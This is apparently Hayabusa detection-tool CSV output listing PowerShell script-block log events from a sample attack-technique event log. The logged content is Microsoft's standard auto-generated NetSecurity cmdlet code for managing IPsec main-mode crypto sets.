($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.Paramete",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardc",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"imv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 